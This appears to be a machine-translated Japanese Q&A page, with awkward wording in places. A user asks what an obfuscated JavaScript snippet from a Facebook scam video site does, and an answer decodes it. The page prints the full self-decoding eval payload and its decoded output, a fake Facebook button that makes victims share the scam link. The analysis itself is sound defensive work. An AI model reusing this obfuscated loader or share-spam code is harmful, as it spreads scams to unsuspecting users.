2011-06-23 11 views
2

友だちだけがFacebookの詐欺サイトでビデオへのリンクを共有しました。それが「ABCD」に「badc」をオンにし、再度試用版のように見えますこのjavascriptは何が厄介なことをしますか?

<script type="text/javascript"> 
//<![CDATA[ 
<!-- 
var x="function f(x){var i,o=\"\",l=x.length;for(i=0;i<l;i+=2) {if(i+1<l)o+=" + 
"x.charAt(i+1);try{o+=x.charAt(i);}catch(e){}}return o;}f(\"ufcnitnof x({)av" + 
" r,i=o\\\"\\\"o,=l.xelgnhtl,o=;lhwli(e.xhcraoCedtAl(1/)3=!84{)rt{y+xx=l;=+;" + 
"lc}tahce({)}}of(r=i-l;1>i0=i;--{)+ox=c.ahAr(t)i};erutnro s.buts(r,0lo;)f}\\" + 
"\"(5)12\\\\,P\\\"RZEA3X02\\\\\\\\\\\\r7\\\\00\\\\\\\\]M)^97gs5400\\\\\\\\3*" + 
"01\\\\\\\\kv7v01\\\\\\\\)iz w|#8 -/-=}v4ptWzYJLU01\\\\0\\\\\\\\\\\\\\\\N\\\\"+ 
"B^[email protected]\\\\0^\\\\[email protected]\\\\\\\\3{03\\\\\\\\[email protected]\\\\\\\\wi y:;8967452" + 
"301Ra77\\\\1P\\\\4+T+2<4523:006\\\\00\\\\03\\\\\\\\30\\\\05\\\\02\\\\\\\\23" + 
"\\\\0T\\\\02\\\\0L\\\\35\\\\06\\\\02\\\\\\\\33\\\\07\\\\03\\\\\\\\20\\\\0K\\"+ 
"\\\\\\t6\\\\01\\\\\\\\02\\\\05\\\\03\\\\\\\\37\\\\02\\\\00\\\\\\\\16\\\\0R\\"+ 
"\\]X22\\\\03\\\\00\\\\\\\\01\\\\07\\\\01\\\\\\\\QY/Z)1>g,.847%i5><;9>';#5h0" + 
"2\\\\\\\\\\\\u\\\\\\\"*\\\\0<b04c03\\\\\\\\WIcYI^TV4T02\\\\\\\\ti\\\\\\\\[W" + 
"21\\\\0F\\\\JF21\\\\0B\\\\Xw0u01\\\\\\\\zIxW03\\\\04\\\\03\\\\\\\\IW1{<!8%(" + 
"EJ5f(vv7c17\\\\\\\\.mP/cm&n0uC1-vol35\\\\0S\\\\16\\\\06\\\\01\\\\\\\\35\\\\" + 
"04\\\\02\\\\\\\\21\\\\0Y\\\\37\\\\0Z\\\\I[02\\\\05\\\\00\\\\\\\\04\\\\07\\\\"+ 
"00\\\\\\\\1L0Q01\\\\\\\\30\\\\02\\\\03\\\\\\\\0H00\\\\\\\\13\\\\04\\\\01\\\\"+ 
"\\\\CX\\\\\\\\\\\\\\\\17\\\\01\\\\00\\\\\\\\-/`rxe05\\\\0c\\\\7oa7aejr!=#!j" + 
"(0r~7~t8&3(22\\\\0J\\\\SS2]03\\\\\\\\02\\\\0\\\\\\\\\\\\\\\\[\\\\WY16\\\\0G" + 
"\\\\VZJY0Y00\\\\\\\\EXOE10\\\\04\\\\03\\\\\\\\[email protected]\\\\\\\\qS77\\\\1n\\\\"+ 
"7<z{cqcsvx1Zc<doJ~p0nddk.bov0o03\\\\\\\\ _7F03\\\\\\\\25\\\\01\\\\00\\\\\\\\"+ 
"03\\\\05\\\\00\\\\\\\\VU6/00\\\\\\\\\\\\t5\\\\02\\\\\\\\1;03\\\\03\\\\00\\\\"+ 
"\\\\37\\\\06\\\\03\\\\\\\\34\\\\0*\\\\23\\\\05\\\\00\\\\\\\\00\\\\0n\\\\\\\\"+ 
"\\\\\\\\rr\\\\\\\\\\\\\\\"\\\\\\\\\\\\\\\"\\\\\\\\\\\\31\\\\0|\\\\01\\\\0a\\"+ 
"\\)(48v45;!#pmno\\\\m\\\\\\\"7\\\\02\\\\\\\\5802\\\\\\\\yh1d03\\\\\\\\/(,#2" + 
"3\\\\0`\\\\RPOH{OTL[S\\\\Z\\\\\\\\q\\\\vs17\\\\[email protected]\\\\XB__\\\\k\\\\\\\\D\\\\" + 
"KCLJca=f Bhou{7{I4a/ewf~}a1,fxu{fs_&d?7l00\\\\\\\\\\\\t7\\\\01\\\\\\\\X[C%Q" + 
"^32\\\\02\\\\03\\\\\\\\^T7V03\\\\\\\\01\\\\0I\\\\\\\\A\\\\\\\\X\\\\YFV^BJ\\" + 
"\\t4\\\\01\\\\\\\\20\\\\01\\\\02\\\\\\\\0?9;-5u}77\\\\1'\\\\h%!7j!\\\\ \\\\" + 
"\\\"/\\\\ck%&f**>!'5&/oZZJT[O\\\\\\\\\\\\\\\\PJ][email protected]\\\\\\\\FE0G00\\\\\\\\" + 
"01\\\\07\\\\02\\\\\\\\\\\\\\\\\\\\\\\\^_5A02\\\\\\\\0R00\\\\\\\\blK|5G03\\\\"+ 
"\\\\rz7|17\\\\\\\\vth&77\\\\1f\\\\f;`vxp!|77\\\\1i\\\\ky{ak(gji-on34\\\\00\\"+ 
"\\03\\\\\\\\37\\\\02\\\\03\\\\\\\\34\\\\0W\\\\17\\\\00\\\\00\\\\\\\\01\\\\0" + 
"Z\\\\I[02\\\\05\\\\00\\\\\\\\04\\\\07\\\\00\\\\\\\\EI5^00\\\\\\\\17\\\\01\\" + 
"\\03\\\\\\\\07\\\\00\\\\02\\\\\\\\^F6C00\\\\\\\\14\\\\06\\\\01\\\\\\\\16\\\\"+ 
"0x\\\\`~\\\\|\\\\\\\";\\\\(5?$z1>6$(`<kd#=7-02\\\\\\\\\\\"\\\\\\\\\\\\*5 (i" + 
"ev$7G17\\\\\\\\UHT_[]AsTQ34\\\\0E\\\\J^XCDO2N02\\\\\\\\01\\\\07\\\\01\\\\\\" + 
"\\HCPKDV=G Bxwusy{5yrzbb-,c&n``~pzq(fjto1c02\\\\\\\\31\\\\0\\\\\\\\(\\\"}fo" + 
";n uret}r);+)y+^(i)t(eAodrCha.c(xdeCoarChomfrg.intr=So+7;12%={y+)i+l;i<0;i=" + 
"r(foh;gten.l=x,l\\\"\\\\\\\"\\\\o=i,r va){,y(x fontincfu)\\\"\")"   ; 
while(x=eval(x)); 

:私は次のように興味深いのJavascriptスニペットを見つけたソースを表示します。

これはどのような不快感が終わるのかを知るJavascriptの達人はいますか?

答えて

6

document.writeln("<span onclick=\"getsome();document.getElementById('close_div').style.display = 'none'; wopen2('http://www.facebook.com/sharer/sharer.php?locale=fi_FI&u=http://www.thegreatvideo.weebly.com/&amp;src=sp','video_prom',160,30,'no','no');\" style=\"cursor: pointer;\" class=\"FBConnectButton FBConnectButton_Small\"> \r\n <span class=\"FBConnectButton_Text\" style=\"font-family:Arial, Helvetica, sans-serif; font-weight:bold; font-size:18px; color:#365ba8;\"></span> <img src=\"http://i.imgur.com/uG46r.gif\" border=\"0\"> </div> \r\n \r\n<div id=\"close_div\" style=\"position:absolute;top:0;left:0;display:block;z-index:100004;\"> \r\n <div style=\"position:relative;width:165px;height:25px;\"> \r\n</div></div>");0;

さて、これは基本的にボタンのようにFacebookのいくつかの種類にあなたを転送します。

<span 
    onclick="getsome();document.getElementById('close_div').style.display = 'none'; wopen2('http://www.facebook.com/sharer/sharer.php?locale=fi_FI&u=http://www.thegreatvideo.weebly.com/&amp;src=sp','video_prom',160,30,'no','no');\" 
    style=\"cursor: pointer;\" 
    class=\"FBConnectButton FBConnectButton_Small\" 
> 
\r\n  
    <span 
    class=\"FBConnectButton_Text\" 
    style=\"font-family:Arial, Helvetica, sans-serif; font-weight:bold; font-size:18px; color:#365ba8;\" 
    ></span> 
    <img 
    src=\"http://i.imgur.com/uG46r.gif\" 
    border=\"0\" 
    > 
</div> 
\r\n \r\n 
<div 
    id=\"close_div\" 
    style=\"position:absolute;top:0;left:0;display:block;z-index:100004;\" 
> 
\r\n    
<div 
    style=\"position:relative;width:165px;height:25px;\" 
> 
\r\n 
</div> 
</div> 

マジック:

while(x=eval(x));

それが頻繁にパッケージ化されます。あなたは実際のコードを取得する前にコードの文字列を3回再評価する必要があります。つまり、基本的に自己修正のソースコードです。私は、自動化されたプログラムが、 "悪意のある"コードを与えるために評価される変数を作成するために使われたと推測します。それは複数回呼ばれました。

関連する問題